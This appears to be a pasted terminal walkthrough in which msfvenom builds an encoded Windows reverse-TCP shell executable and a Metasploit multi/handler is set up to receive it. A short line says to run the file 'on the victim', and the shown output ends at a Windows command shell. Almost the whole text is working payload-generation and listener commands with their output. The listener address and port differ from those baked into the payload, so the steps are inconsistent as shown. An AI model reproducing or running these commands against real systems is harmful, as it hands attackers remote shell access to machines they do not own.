venom_today

1. oot@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
2. Found 1 compatible encoders
3. Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
4. x86/shikata_ga_nai succeeded with size 326 (iteration=0)
5. x86/shikata_ga_nai chosen with final size 326
6. Payload size: 326 bytes
7. Saved as: /tmp/1.exe
8.  
9. root@kali:# file /tmp/1.exe
10. /tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows
11.  
12. _______________________________
13. root@kali:# msfconsole
14.  
15. ## ### ## ##
16. ## ## #### ###### #### ##### ##### ## #### ######
17. ####### ## ## ## ## ## ## ## ## ## ## ### ##
18. ####### ###### ## ##### #### ## ## ## ## ## ## ##
19. ## # ## ## ## ## ## ## ##### ## ## ## ## ##
20. ## ## #### ### ##### ##### ## #### #### #### ###
21. ##
22.  
23.  
24. =[ metasploit v4.11.3-2015063001 [core:4.11.3.pre.2015063001 api:1.0.0]]
25. + -- --=[ 1465 exploits - 839 auxiliary - 230 post ]
26. + -- --=[ 428 payloads - 37 encoders - 8 nops ]
27.  
28. msf > use exploit/multi/handler
29. msf exploit(handler) > show options
30.  
31. Module options:
32.  
33. Name Current Setting Required Description
34. ---- --------------- -------- -----------
35.  
36.  
37. Exploit target:
38.  
39. Id Name
40. -- ----
41. 0 Wildcard Target
42.  
43.  
44. ----------------------------------------
45. msf exploit(handler) > set payload windows/shell/reverse_tcp
46. payload => windows/shell/reverse_tcp
47. msf exploit(handler) > show options
48.  
49. Module options:
50.  
51. Name Current Setting Required Description
52. ---- --------------- -------- -----------
53.  
54.  
55. Payload options (windows/shell/reverse_tcp):
56.  
57. Name Current Setting Required Description
58. ---- --------------- -------- -----------
59. EXITFUNC thread yes Exit technique: seh, thread, process
60. LHOST yes The local address
61. LPORT 4444 yes The local port
62.  
63.  
64. Exploit target:
65.  
66. Id Name
67. -- ----
68. 0 Wildcard Target
69.  
70.  
71. msf exploit(handler) > set LHOST 172.16.104.130
72. LHOST => 172.16.104.130
73. msf exploit(handler) > set LPORT 31337
74. LPORT => 31337
75. msf exploit(handler) >
76.  
77. Now that we have everything set up and ready to go, we run ‘exploit’ for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.
78.  
79. msf exploit(handler) > exploit
80.  
81. [*] Handler binding to LHOST 0.0.0.0
82. [*] Started reverse handler
83. [*] Starting the payload handler...
84. [*] Sending stage (474 bytes)
85. [*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)
86.  
87. Microsoft Windows XP [Version 5.1.2600]
88. (C) Copyright 1985-2001 Microsoft Corp.
89.  
90. C:\Documents and Settings\Victim\My Documents>